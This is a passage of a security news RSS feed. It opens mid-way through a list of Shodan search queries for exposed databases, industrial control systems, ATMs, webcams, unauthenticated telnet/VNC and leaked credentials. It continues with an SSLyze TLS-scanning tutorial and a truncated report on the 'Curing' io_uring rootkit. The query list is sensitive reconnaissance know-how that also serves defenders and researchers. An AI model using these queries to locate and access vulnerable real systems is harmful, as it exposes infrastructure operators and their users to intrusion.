ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS Automated License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active Management CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with Anonymous Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers &amp; Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache Directory Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br><br><div><b><span><a class="kiploit-download" href="https://github.com/nullfuzz-pentest/shodan-dorks" rel="nofollow" target="_blank" title="Download Shodan-Dorks">Download Shodan-Dorks</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SSLyze -- Find Mis-Configuration on SSL]]></title>
<description><![CDATA[Information gathering is a very crucial part of cybersecurity. If our target is a web server then we need to know a lot of things about it. We use various tools to do this jobs easily.SSLyze is a fast and powerful python tool that can be used to analyze the SSL configuration of a server by connec...]]></description>
<link>https://tsecurity.de/de/2758541/hacking/sslyze-find-mis-configuration-on-ssl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2758541/hacking/sslyze-find-mis-configuration-on-ssl/</guid>
<pubDate>Mon, 05 May 2025 17:20:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Information gathering is a very crucial part of cybersecurity. If our target is a web server then we need to know a lot of things about it. We use various tools to do this jobs easily.</p><p><a href="https://github.com/nabla-c0d3/sslyze" target="_blank">SSLyze</a> is a fast and powerful python tool that can be used to analyze the SSL configuration of a server by connecting to it. <b>SSLyze</b> comes pre-installed with <b>Kali Linux</b>.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjdJ9feZUClN6JVjNhzVRXXmqiXV_w9mqsMEOTJ-SHsAynX8n-GET_KFffAegdyJhPYYfo2NJd69VeZd3Oh8x0wxvHdvnDj0uYPx4mYUtXLXCDB-6kFnyiJjeS03DliBp-11obhjQq0QM/s500/SSLyze+Thumbnail.webp"><img alt="SSLyze on Kali Linux" border="0" data-original-height="302" data-original-width="500" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjdJ9feZUClN6JVjNhzVRXXmqiXV_w9mqsMEOTJ-SHsAynX8n-GET_KFffAegdyJhPYYfo2NJd69VeZd3Oh8x0wxvHdvnDj0uYPx4mYUtXLXCDB-6kFnyiJjeS03DliBp-11obhjQq0QM/w320-h193/SSLyze+Thumbnail.webp" title="SSLyze on Kali Linux" width="320"></a></div><p>It allows us to analyze the SSL/TLS configuration of a server by connecting to it, in order to detect various issues (bad certificate, weak cipher suites, <a href="https://www.kalilinux.in/2019/02/metasploit-bleeding-heart.html" target="_blank">Heartbleed</a>, ROBOT, TLS 1.3 support, etc).</p><p>SSLyze can either be used as command line tool or as a Python library.</p><h2><span>Key-Features of SSLyze</span></h2><ul><li>Multi-processed and multi-threaded scanning (it’s really fast).</li><li>SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility.</li><li>Fully documented Python API, in order to run scans and process the results directly from Python.</li><li>Support for TLS 1.3 and early data (0-RTT) testing.</li><li>Scans are automatically dispatched among multiple workers, making them very fast.</li><li>Performance testing: session resumption and TLS tickets support.</li><li>Security testing: weak cipher suites, supported curves, ROBOT, Heartbleed and more.</li><li>Server certificate validation and revocation checking through OCSP stapling.</li><li>Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.</li><li>Scan results can be written to a JSON file for further processing.</li></ul><p> Let's get started without wasting time. We know it comes with Kali Linux pre-installed but if not installed in some installation we can install it by using following command:</p><pre><code class="ns">sudo apt-get install sslyze</code></pre><p></p><p>By applying above command we can install/upgrade SSLyze on our Kali Linux system. Then we can check the help of this tool by using following command:</p><pre><code class="ns">sslyze -h</code></pre><p>The screenshot of the command is following:</p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-_FL32oYfb8eVilKXe3mrHiTWKoZEnNEmI_7HR_IJg0upI9kWSeMg6gIO5THy4A9Ge-Gi1mGhQ9Sk91spuAqYXqW5vG6yCrNG5vY-cRooTHV659Tid3QHuahVNoORG3NpfN_gdJZl5Y/s822/sslyze.png"><img alt="sslyze help menu" border="0" data-original-height="364" data-original-width="822" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-_FL32oYfb8eVilKXe3mrHiTWKoZEnNEmI_7HR_IJg0upI9kWSeMg6gIO5THy4A9Ge-Gi1mGhQ9Sk91spuAqYXqW5vG6yCrNG5vY-cRooTHV659Tid3QHuahVNoORG3NpfN_gdJZl5Y/w640-h284/sslyze.png" title="sslyze help menu" width="640"></a></div><p></p><p>Now we can read all the options we can use. This is easy to understand we just need to read carefully the help menu and use right flag for what we are trying to get from the server.</p><p>In our this article we are going to run a regular scan on a website, by using following command:</p><pre><code class="ns">sslyze --regular www.google.com<br></code></pre><p>Here we have choose a well known website for just an example. We can choose any website or server in the world. We also can put IP address here.</p><p>We got the results in the following screenshot:</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-EwGW9hUe1ywYGrtsGslPJuESarLT1k6WQTsoRTKuexxn2dZzrKJI-d2VVrbpPoG4q9GwA_Oizm1ZwMsiasm7UDCC6zSaUV1MIouixg2dFCKF-QCr_wrjfQdODmWaQuTBe6KCH7MUAi0/s1366/sslyze+google.webp"><img alt="sslyze regular scan" border="0" data-original-height="768" data-original-width="1366" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-EwGW9hUe1ywYGrtsGslPJuESarLT1k6WQTsoRTKuexxn2dZzrKJI-d2VVrbpPoG4q9GwA_Oizm1ZwMsiasm7UDCC6zSaUV1MIouixg2dFCKF-QCr_wrjfQdODmWaQuTBe6KCH7MUAi0/w400-h225/sslyze+google.webp" title="sslyze regular scan" width="400"></a></div><p>We can scroll down to see the total result of the scan.</p><p>Even not a regular scan we can use many flags to know what we want. We can all the flags (options) on the help menu.</p><p>For another example if we need to check for OpenSSL HeratBleed on the server we can use following command:</p><pre><code class="ns">sslyze --heartbleed www.google.com</code></pre><p>We know that targeted host Google is not vulnerable to OpenSSL HeartBleed vulnerability. But other domains may be vulnerable.</p><p>This is how we can test web server's using SSLyze on our Kali Linux system. This is very helpful for organizations and testers identify mis-configurations affecting their SSL servers.<br></p><p><span>Do you enjoy reading our articles? Be sure to follow us on <a href="https://twitter.com/KaliLinux_in" target="_blank"><b>Twitter</b></a> and <b><a href="https://github.com/jaykali" target="_blank">GitHub</a></b> for regular updates on new articles. If you want to join our KaliLinuxIn family and be part of a community focused on Linux and Cybersecurity, feel free to join our <b><a href="https://t.me/kalilinuxin" target="_blank">Telegram Group</a></b>.</span></p><p><span>We value building a strong community and are always here to help. Feel free to leave your comments in the comment section, as we read and reply to each one. We appreciate your engagement and look forward to connecting with you.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Linux Rootkit ‘Curing’ Exploits io_uring to Evade System Call Monitoring]]></title>
<description><![CDATA[New Linux Rootkit ‘Curing’ Exploits io_uring to Evade System Call Monitoring
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 1
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
				
				
				
				...]]></description>
<link>https://tsecurity.de/de/2742408/it-security-nachrichten/new-linux-rootkit-curing-exploits-iouring-to-evade-system-call-monitoring/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2742408/it-security-nachrichten/new-linux-rootkit-curing-exploits-iouring-to-evade-system-call-monitoring/</guid>
<pubDate>Fri, 25 Apr 2025 11:04:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">New Linux Rootkit ‘Curing’ Exploits io_uring to Evade System Call Monitoring</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-284079 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">1</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="flex-1 overflow-hidden @container/thread">
<div class="h-full">
<div class="react-scroll-to-bottom--css-hlgkg-79elbk h-full">
<div class="react-scroll-to-bottom--css-hlgkg-1n7m0yu">
<div class="flex flex-col text-sm md:pb-9">
<article class="w-full scroll-mb-[var(--thread-trailing-height,150px)] text-token-text-primary focus-visible:outline-2 focus-visible:outline-offset-[-4px]" dir="auto" data-testid="conversation-turn-303" data-scroll-anchor="true">
<div class="m-auto text-base py-[18px] px-3 md:px-4 w-full md:px-5 lg:px-4 xl:px-5">
<div class="mx-auto flex flex-1 gap-4 text-base md:gap-5 lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]">
<div class="group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn">
<div class="flex-col gap-1 md:gap-3">
<div class="flex max-w-full flex-col flex-grow">
<div class="min-h-8 text-message flex w-full flex-col items-end gap-2 whitespace-normal break-words text-start [.text-message+&amp;]:mt-5" dir="auto" data-message-author-role="assistant" data-message-id="780b2db2-e3cd-4c79-b2d4-4e39f2f5fa49" data-message-model-slug="gpt-4o">
<div class="flex w-full flex-col gap-1 empty:hidden first:pt-[3px]">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 class="" data-start="565" data-end="632"><strong>New Linux Rootkit ‘Curing’ Evades Detection via io_uring Exploit</strong></h2>
<p class="" data-start="634" data-end="927">A new proof-of-concept rootkit dubbed <a href="https://github.com/armosec/curing" target="_blank" rel="noopener"><strong data-start="672" data-end="682">Curing</strong></a> highlights a critical blind spot in Linux runtime security tools by abusing the <a href="https://man7.org/linux/man-pages/man7/io_uring.7.html" target="_blank" rel="noopener"><strong data-start="763" data-end="775">io_uring</strong></a> interface to operate without triggering system call monitors. The technique effectively bypasses traditional defenses used by major security solutions.</p>
<hr class="" data-start="929" data-end="932">
<h2 class="" data-start="934" data-end="997"><strong>io_uring: A Legitimate Kernel Feature with Stealth Potential</strong></h2>
<p class="" data-start="999" data-end="1350">First introduced in <strong data-start="1019" data-end="1039">Linux kernel 5.1</strong> in March 2019, <code data-start="1055" data-end="1065">io_uring</code> is a system call interface designed for high-performance asynchronous I/O operations. It utilizes a <strong data-start="1166" data-end="1191">submission queue (SQ)</strong> and <strong data-start="1196" data-end="1221">completion queue (CQ)</strong> to reduce the overhead of traditional syscalls by allowing user-space applications to interact with the kernel more efficiently.</p>
<p class="" data-start="1352" data-end="1564">But this same performance boost presents a double-edged sword: malicious code can leverage io_uring to perform operations without invoking common system calls — a method increasingly exploited to evade detection.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</article>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So, you want to be a hacker?<br></strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
